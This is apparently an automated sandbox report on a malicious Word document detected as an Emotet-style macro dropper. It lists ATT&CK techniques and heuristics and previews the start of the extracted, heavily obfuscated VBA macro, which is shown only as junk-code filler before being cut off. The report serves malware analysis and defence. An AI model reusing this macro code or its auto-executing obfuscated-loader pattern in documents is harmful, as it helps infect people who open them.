Verdict: MALICIOUS
Risk Score: 330
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample is an Office document containing heavily obfuscated VBA macros. Heuristics indicate the presence of auto-executing macros (Document_Open) that utilize Shell() and CreateObject calls, typical for downloading and executing further malicious content. The ClamAV detection name 'Doc.Dropper.Emodldr-6755244-0' further supports its role as a dropper.
Heuristics (9)
- ClamAV: Doc.Dropper.Emodldr-6755244-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
- VBA macros detected (medium, OLE_VBA_MACROS; 6 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main: in document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 188759 bytes | fdfc570fe2daaf5c5fb9712d0cbe384363c570ce257a821dbecc9246ca08aefd |
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function iqEZtDe(fvsnelEd As String) As String
kewVP = 630 - 1198 - 1943
For SxbWwN = 0 To 6
bDEQCuqr = Right("e-hRHM^f.jC?!_", 3)
HZxhNF = StrReverse("JV)r*[Ez*IPv_kYF&")
TqXpA = RTrim("u-Qxe.&^VYp.jlR_B")
HZxhNF = Space(16)
eSNfgBwRDUE = RTrim("XPIc]-t(YN&V-ml!")
Next SxbWwN
NAMeaCp = Left("Yy-]xIsmqkqHHEGjK(@", 5)
eSNfgBwRDUE = 1536 + 1080 + 1162
bDEQCuqr = 1435 + 1930 + 994
YxjxBnmxvj = UCase("a?CsXhYb]eJ)P")
While fGpAuI < 3
WFVSiLOGiz = RTrim("$hx&d)F]M?-EWC?_er")
UZLDSE = Space(10)
kewVP = "ZcH%N%jPtwj)$T" + "x!FYmKKp$*GW" + "F_Nh)b#NISwXO$bB"
iwgMvUchTxsU = LTrim("bpcPo(XD-H_Z")
KrtlNclOmAoo = 1620 - 1310 - 1426
zMGhAR = LTrim("Yc?YfJEvLFj)_xXcuzTe")
NAMeaCp = Right("ej$Ch!KLL.@(gfXI yIQ", 5)
kewVP = Space(17)
zOQeZCRu = RTrim("]?TeaQ[z(xR")
fGpAuI = fGpAuI + 3
Wend
Dim INaVhhYZ() As Byte
KrtlNclOmAoo = "&CpB*T-uB@]*Uxw" + "HdnX!yD*@_eseBGSg)H" + "^NdfJdJQ%.Oh!"
For bSLkwR = 0 To 9
EcfidI = RTrim("eSehLd^slB")
UZLDSE = 1040 - 1548 - 1296
HZxhNF = 917 - 1954 - 1873
bWLduzAeZLW = "TZ[.AeF#CP&BD!b&" + "HEG#njZJ^AZ@EEH" + "k^a.YcjB]R#SfP"
zMGhAR = StrReverse("#ugWd.hzqPsgim xDB")
TqXpA = "D^M*FoyU#OAwm[bwhx]s" + "LFrERUbUgyUOlcPC" + "wCjEl do.o_eRGM.[y"
zOQeZCRu = RTrim("Hf@LjPLrcaFm")
Next bSLkwR
For QMcAZz = 0 To 2
While wzGQev < 3
zOQeZCRu = RTrim("lOHhoDvaqujxpbs")
bWLduzAeZLW = LTrim("GqU?(lj-jChB#b%cgQRs")
Ilfqa = "hGU -JIJ !xh[xG)VqQ" + "#sJ?UyY[pzZ" + "mF[.yfN_Ou^RzHs"
bDEQCuqr = StrReverse("n^I]WmEEampMrsnh")
NAMeaCp = UCase("CNL)g)Wn _")
WFVSiLOGiz = Right("uXQXHLWoT]", 4)
Ilfqa = 893 + 1887 + 1636
TqXpA = LTrim("S%qVBsqDWl(w#")
kewVP = UCase("WycA^aWvtQDR^%(ATox@")
wzGQev = wzGQev + 2
Wend
aESTZiwniR = "D-aPBlpotN]yk]kiN" + "cR%xpddKXIkVaJ*" + "pdAtY]zq.$yr]b"
PUobpfmGH = 824 + 184 + 864
PUobpfmGH = StrReverse("pINX(WCPbUDt[uqwMGR")
aESTZiwniR = Left("thQ.PYLCNN.NayqokE", 2)
WFVSiLOGiz = Space(16)
bDEQCuqr = RTrim("vDJFP-A^w!-lqM#")
WFVSiLOGiz = 666 + 1120 + 139
PUobpfmGH = RTrim("m*Zr&Ap$Wme ")
PUobpfmGH = "!JkKiQRG!_UM" + "!Ip*vvJH]." + "kUOp*W]@VFQ-Ji%$$"
zMGhAR = 947 + 1623 + 1217
Next QMcAZz
For oFucHF = 0 To 6
YxjxBnmxvj = 1198 - 615 - 1571
zMGhAR = RTrim(")nL-(zHX]XRSW%EFL")
zMGhAR = LTrim("QcuRpdbCPs?KVkYoh")
WFVSiLOGiz = LTrim("f)TCdmyB-h")
EcfidI = 268 - 575 - 790
Ilfqa = UCase("rJf@VFoWM#RO yD$$bAU")
KrtlNclOmAoo = RTrim("RuuOPUgOJyL")
Ilfqa = 1134 + 1620 + 798
Next oFucHF
PUobpfmGH = 1936 + 508 + 1098
For ZWCOai = 0 To 9
TqXpA = Left("l.QNCdKuKqJl ^!eX", 5)
kewVP = UCase(")@. &@Elhr^qHDS]Y_@")
Next ZWCOai
For aVgYmI = 0 To 9
eSNfgBwRDUE = Space(2)
iwgMvUchTxsU = Right("aunoiGHuezVPAgE%", 5)
KrtlNclOmAoo = StrReverse("zsHtiyZRpb_JEl")
WFVSiLOGiz = LTrim("VZ#_gzlmaacES@")
bWLduzAeZLW = LTrim(" _x!!y[DZV(")
HZxhNF = Right("vjPAFfkDmq?bzACa]Y(", 4)
iwgMvUchTxsU = Space(18)
Next aVgYmI
TqXpA = UCase("ezm[$dVj_Jk.f")
Dim YUljnw As Integer
NAMeaCp = Right("].DA-mobum", 4)
UZLDSE = Right("dfXxI.mMhKF@QHkr[", 4)
While qnTwWW < 4
WFVSiLOGiz = Right("Qz@nuSRNgcZic%f", 2)
EcfidI = UCase("QLhi]Z$#iQ!ZvjuSq.Z")
eSNfgBwRDUE = StrReverse("NJWu@tGuWk^[h)x[Q !n")
bWLduzAeZLW = LTrim("bqa$iCP?Y$^")
eSNfgBwRDUE = Right("nLvnOP?_X#rpj-EOPZ", 3)
UZLDSE = 733
... (truncated)